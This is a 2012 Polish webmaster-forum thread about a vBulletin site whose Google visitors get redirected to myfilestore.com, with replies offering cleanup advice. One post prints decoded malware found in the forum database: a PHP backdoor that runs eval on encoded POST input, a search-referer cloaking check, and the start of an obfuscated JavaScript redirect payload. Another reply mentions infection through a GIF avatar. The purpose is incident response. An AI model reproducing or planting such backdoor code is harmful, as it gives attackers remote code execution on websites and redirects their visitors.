kuba.3477 0 Zgłoś post Napisano Luty 28, 2012 (edytowany) Cześć, mam taki dziwny problem na forum vbulletin (3.8.7). Dzisiaj szukałem czegoś w google i wszedłem na moje forum przez link w wynikach wyszukiwania google. Co ciekawe zamiast forum w pasku pojawił się adres: myfilestore.com Przeczytałem już wszystko w sieci na ten temat, jednak nic nie pomaga. Admin mojego dedyka również wszystko sprawdził i wydaje się nie być problemu z serwerem. Ma ktoś jakiś pomysł? PS: Dodam jako ciekawostkę, że identyczny komunikat dostałem dzisiaj wchodząc na peb (również przez google). Edytowano Luty 28, 2012 przez kuba.3477 (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
root.ie 0 Zgłoś post Napisano Luty 28, 2012 (edytowany) Sugerując się tą ciekawostką, proponuję przeskanować swój system. Edytowano Luty 28, 2012 przez root.ie (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 28, 2012 Problem na 100% nie leży w moim systemie. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość AceDude Zgłoś post Napisano Luty 28, 2012 .htaccess Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 28, 2012 Sprawdzony, wszystko jest dobrze. Chodzi o coś takiego, fotka z neta... Udostępnij ten post Link to postu Udostępnij na innych stronach
root.ie 0 Zgłoś post Napisano Luty 28, 2012 Tu masz odpowiedź: https://www.vbulletin.com/forum/showthread.php/380708-Google-Re-Direct-clicks-to-my-forum-to-MyFileStore-com Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 28, 2012 Problem jednak w tym, że serwer został dokładnie sprawdzony i te sugestie nie pomagają w rozwiązaniu problemu. Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Luty 28, 2012 Masz doklejny gdzieś kod javascript który wykonuje się z apomcą unescape - przejrzyj pliki na ftp i szablony w bazie danych. Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 29, 2012 (edytowany) Niestety nic nie pomaga, dzisiaj po 24h znowu pojawiło się przekierowanie. Tak samo na peb i na hdtv.com.pl/forum Edytowano Luty 29, 2012 przez kuba.3477 (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
tym 205 Zgłoś post Napisano Luty 29, 2012 To kogoś zatrudnij bo widać że nie ogarniasz tematu... Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 29, 2012 No właśnie działa najlepszy admin z wht i nie możemy nic znaleźć. Myślałem, że może ktoś z Was miał podobny problem i może coś doradzić. Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Luty 29, 2012 (edytowany) Napisz do mnie na gg, na 99% nie będzie jakoś strasznie ciężkie to http://www.webhostingtalk.pl//public/style_emoticons/#EMO_DIR#/wink.png Edytowano Styczeń 25, 2013 przez xorg (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
kuba.3477 0 Zgłoś post Napisano Luty 29, 2012 (edytowany) Cześć, coś takiego znaleźliśmy (rozkodowany fragment) w baza forum -> tabela datastore -> wpis plugins if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x); ini_set('display_errors',0);ini_set('log_errors',0); $r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER'); if(strlen($r)>10) { $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip); if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false)) { $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com'); foreach($s as $e) { if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp']))) { $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8)); die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl Spotkaliście z takim problemem? Może wiecie, jak to wywalić całkowicie? Edytowano Luty 29, 2012 przez kuba.3477 (zobacz historię edycji) Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Luty 29, 2012 Przejrzyj jeszcze wtyczki. Udostępnij ten post Link to postu Udostępnij na innych stronach
devilMedia.pl 26 Zgłoś post Napisano Luty 29, 2012 To stary bug vB. Wystarczyło wgrać zainfekowanego gif'a jako awatar w którym przerzuciliśmy "bonusowy" kod. Później już z górki. Spójrz na to: http://www.vbseo.com/f77/google-redirecting-filestore123-info-49062/index3.html#post309843 Udostępnij ten post Link to postu Udostępnij na innych stronach